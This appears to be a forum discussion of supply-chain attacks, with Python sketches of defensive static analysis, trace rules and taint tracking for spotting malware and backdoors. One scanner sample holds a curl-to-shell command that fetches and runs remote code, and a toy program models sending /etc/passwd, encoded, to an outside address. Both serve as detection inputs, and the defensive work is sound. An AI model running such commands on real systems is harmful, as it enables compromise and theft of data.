The more important and widely used open source software becomes, the more appealing supply-chain attacks against it are.
The world where it doesn’t happen is one where open source doesn’t become successful.
I expect that we’ll find ways to mitigate stuff like this: run a lot more software in isolation, add more automated checks, make more use of developer reputation, do automated code analysis, get better at monitoring system changes, maybe put some kind of “trust metric” on packages.
Go back to the 1990s, and most everything I sent online was unencrypted. In 2024, most traffic I send is encrypted. I imagine that changes can be made here too.
Yeah, I think there’s a lot of potential in code analysis. There’s only a limited set of ways malware can do anything interesting, even if there are many permutations of how it does them.
So look for the interesting things, like:
accessing other programs’ address spaces
reading/writing files
deleting/moving files
sending/receiving network traffic
system calls and console commands
interacting with hardware
spawning new processes
displaying things on the screen
accessing timing information
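As a first pass, a list like this could drive a static scan. The sketch below assumes the code under review is Python and uses the standard `ast` module to find calls in a few of those categories; the `CAPABILITY_CALLS` table and its category names are made up for illustration and cover only a handful of entries.

```python
import ast

# Hypothetical, deliberately tiny table mapping call names to categories.
# A real scanner would need many more entries and would have to resolve aliases
# (e.g. "from os import system"), which this sketch does not do.
CAPABILITY_CALLS = {
    "open": "files: read/write",
    "os.remove": "files: delete/move",
    "os.rename": "files: delete/move",
    "shutil.rmtree": "files: delete/move",
    "socket.socket": "network",
    "urllib.request.urlopen": "network",
    "os.system": "OS / console commands",
    "subprocess.run": "spawning processes",
    "subprocess.Popen": "spawning processes",
    "time.perf_counter_ns": "timing information",
}


def dotted_name(node):
    """Rebuild a dotted name such as 'os.remove' from a call target, or return None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def scan_capabilities(source):
    """Return {category: sorted line numbers} for every recognized call in `source`."""
    found = {}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            category = CAPABILITY_CALLS.get(dotted_name(node.func))
            if category:
                found.setdefault(category, []).append(node.lineno)
    return {cat: sorted(lines) for cat, lines in found.items()}


if __name__ == "__main__":
    sample = "import os\nos.system('curl http://198.51.100.7 | sh')\n"
    print(scan_capabilities(sample))  # {'OS / console commands': [2]}
```

A hit here isn’t evidence of anything by itself; it only tells you where to look.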
Obviously there are legitimate uses for each of these, so that’s just the first step.
Next, analyze the data involved in each of those operations:
what’s the source?
what’s the destination?
what kind of transformations are being applied to the data?
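One cheap signal for the transformation question is byte entropy: data that has been compressed or encrypted before it leaves tends to look close to random. This is a rough illustration, not a detector; the sensitive-path prefixes, the 7.5 bits/byte threshold, and the rule that any destination not starting with `/` counts as network traffic are all assumptions made up for the example.

```python
import math
from collections import Counter

# Hypothetical labels and threshold, chosen for illustration only.
SENSITIVE_SOURCES = ("/etc/", "/root/")
HIGH_ENTROPY = 7.5  # bits per byte; compressed or encrypted data usually sits near 8


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, up to 8.0 for uniformly distributed bytes.
    Note that short payloads can never exceed log2(len(data))."""
    if not data:
        return 0.0
    n = len(data)
    return sum(-(c / n) * math.log2(c / n) for c in Counter(data).values())


def describe_flow(source, destination, payload):
    """Summarize one data flow: where it came from, where it went, how random it looks."""
    h = shannon_entropy(payload)
    notes = []
    if source.startswith(SENSITIVE_SOURCES):
        notes.append("sensitive source")
    if not destination.startswith("/"):  # assumption: non-path destinations are network
        notes.append("network destination")
    if h >= HIGH_ENTROPY:
        notes.append("looks encrypted/compressed")
    return {"source": source, "destination": destination,
            "entropy": round(h, 2), "notes": notes}
```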
Then you can watch out for things like:
is it systematically going through directories and doing some operation to all files? (Maybe ransomware, data scrubbing, or just maliciously deleting stuff?)
is it grabbing data from somewhere and sending it somewhere else on the internet? (Stealing data?)
is it using timing information to build data? (Timing attacks to figure out kernel data that should be hidden?)
is it changing OS settings/setup?
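These questions map fairly directly onto rules over a trace of what a program did. The sketch assumes a hypothetical trace of `(operation, target)` pairs, roughly what a sandbox or syscall tracer might produce after some post-processing; the operation names (`read`, `write`, `delete`, `rename`, `send`, `clock`), the path prefixes, and the thresholds are illustrative assumptions.

```python
import posixpath
from collections import defaultdict

# Hypothetical watch list; a real one would be platform- and policy-specific.
SENSITIVE_PREFIXES = ("/etc/", "/root/", "/home/")
MODIFYING_OPS = ("write", "delete", "rename")


def find_suspicious(events, bulk_threshold=50, timing_threshold=1000):
    warnings = []

    # Same modifying operation applied to many files in one directory
    # (ransomware, data scrubbing, mass deletion?)
    per_dir = defaultdict(set)
    for op, target in events:
        if op in MODIFYING_OPS:
            per_dir[(op, posixpath.dirname(target))].add(target)
    for (op, directory), files in sorted(per_dir.items()):
        if len(files) >= bulk_threshold:
            warnings.append(f"bulk {op}: {len(files)} files in {directory}")

    # Sensitive data read, followed by network traffic (stealing data?).
    # This only checks ordering, not that the same bytes actually flowed out.
    sensitive_read = None
    for op, target in events:
        if op == "read" and sensitive_read is None and target.startswith(SENSITIVE_PREFIXES):
            sensitive_read = target
        elif op == "send" and sensitive_read is not None:
            warnings.append(f"send to {target} after reading {sensitive_read}")

    # Heavy use of high-resolution timers (timing attack?)
    clock_reads = sum(1 for op, _ in events if op == "clock")
    if clock_reads >= timing_threshold:
        warnings.append(f"timing: {clock_reads} high-resolution clock reads")

    # Changes to OS settings/setup
    for op, target in events:
        if op in MODIFYING_OPS and target.startswith("/etc/"):
            warnings.append(f"os config change: {op} {target}")

    return warnings
```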
Then generate a report of everything it is doing and see if it aligns with what the code is supposed to do. Or you could even build some kind of permissions system around that with more sophistication than the basic “can this app access files? How about the internet?”
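A finer-grained permission check could compare what a program was observed doing against what it declared up front. Here the `Capability` type, the manifest contents, and the matching rules (paths compared by whole components, hosts compared exactly) are hypothetical choices for illustration, not any existing packaging system’s format.

```python
from dataclasses import dataclass


@dataclass(frozen=True, order=True)
class Capability:
    kind: str    # hypothetical kinds: "read", "write", "connect"
    target: str  # a path for file access, a host for network access


def covers(declared, observed):
    """True if one declared capability permits one observed action."""
    if declared.kind != observed.kind:
        return False
    if declared.kind == "connect":
        return declared.target == observed.target  # hosts must match exactly
    # Compare whole path components, so "/srv/share" does not cover "/srv/shared".
    base = declared.target.rstrip("/")
    return observed.target == base or observed.target.startswith(base + "/")


def report(observed, declared):
    """Split observed actions into those the manifest allows and those it doesn't."""
    allowed, undeclared = set(), set()
    for action in observed:
        if any(covers(d, action) for d in declared):
            allowed.add(action)
        else:
            undeclared.add(action)
    return {"allowed": sorted(allowed), "undeclared": sorted(undeclared)}


if __name__ == "__main__":
    manifest = {Capability("read", "/srv/share"), Capability("connect", "peer.example.net")}
    seen = [Capability("read", "/srv/share/song.ogg"),
            Capability("read", "/etc/passwd"),
            Capability("connect", "198.51.100.7")]
    for item in report(seen, manifest)["undeclared"]:
        print("undeclared:", item.kind, item.target)
```

The point of the design is that “can read /srv/share” is a much narrower promise than “can access files,” so anything outside it stands out in the report.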
Computer programs can be complex, but they’re ultimately made up of a series of simple operations. It’s possible to build an interpreter that performs those operations and follows everything through, so you can see exactly what ends up in the huge amount of data a program sends over the network. That’s how you’d notice that your file-sharing program is, for some reason, also sending /etc/passwd to a random address, or is listening for someone to hit a particular sequence of closed ports (port knocking) and will then do x, y, z if that ever happens. Backdoors could be obvious with the right analysis tools, especially when the software is built from source (though I believe it’s still possible with binaries, just a bit harder).
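Here is a toy version of that idea: an interpreter for a made-up instruction set where every value carries a set of labels (taint) recording which inputs it was derived from, so at each network send you can ask what actually went out. Real programs would mean interpreting machine code or bytecode; the instruction names, the in-memory `files` dict, and the `SENSITIVE` set are hypothetical stand-ins.

```python
import base64

SENSITIVE = frozenset({"/etc/passwd", "/etc/shadow"})  # hypothetical watch list


def run(program, files):
    """Interpret a toy program; return every send as (host, bytes, taint labels)."""
    regs = {}   # register name -> (value, frozenset of source labels)
    sends = []
    for op, *args in program:
        if op == "const":
            dst, value = args
            regs[dst] = (value, frozenset())               # literals carry no taint
        elif op == "read_file":
            dst, path = args
            regs[dst] = (files[path], frozenset({path}))   # taint = the file it came from
        elif op == "concat":
            dst, a, b = args
            (va, ta), (vb, tb) = regs[a], regs[b]
            regs[dst] = (va + vb, ta | tb)                 # result carries both inputs' taint
        elif op == "b64":
            dst, src = args
            value, taint = regs[src]
            regs[dst] = (base64.b64encode(value), taint)   # encoding hides bytes, not origin
        elif op == "send":
            host, src = args
            value, taint = regs[src]
            sends.append((host, value, taint))
        else:
            raise ValueError(f"unknown instruction {op!r}")
    return sends


def leaks(sends):
    """Hosts that received data derived from a sensitive file, with the files involved."""
    return [(host, sorted(taint & SENSITIVE)) for host, _, taint in sends if taint & SENSITIVE]


if __name__ == "__main__":
    files = {"/srv/share/song.ogg": b"OggS...", "/etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n"}
    program = [
        ("read_file", "r1", "/srv/share/song.ogg"),
        ("send", "peer.example.net", "r1"),   # the expected, legitimate transfer
        ("read_file", "r2", "/etc/passwd"),
        ("const", "r3", b"stats:"),
        ("concat", "r4", "r3", "r2"),
        ("b64", "r5", "r4"),
        ("send", "203.0.113.9", "r5"),        # disguised as "stats", still tainted
    ]
    print(leaks(run(program, files)))  # [('203.0.113.9', ['/etc/passwd'])]
```

This only follows direct data flow; real taint tracking also has to handle implicit flows (branching on secret data), which is considerably harder.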
The Jia Tan xz backdoor did get flagged by some automated analysis tools, and that was a pretty sophisticated attack: they had to get the tools modified so the code would pass. The people running the tests didn’t catch it and took the Jia Tan group’s word that it was a false positive that needed fixing, but the tools were still putting up warning lights.
More sophisticated attackers will probably replicate the code analysis environments they know are used online, run every analysis tool they can locally before making the code public, and tweak it until it passes. Still, I think it definitely raises the bar.
We could also have some analysis tools that aren’t made public but are run against important public code repositories, specifically to make this harder.
Why can’t we have nice things instead.
I mean, this kind of stuff was going to happen.
I believe you. There is no AI ever made that could have as bad a grammar as you. ;)
Because people have forgotten that bad actors exist.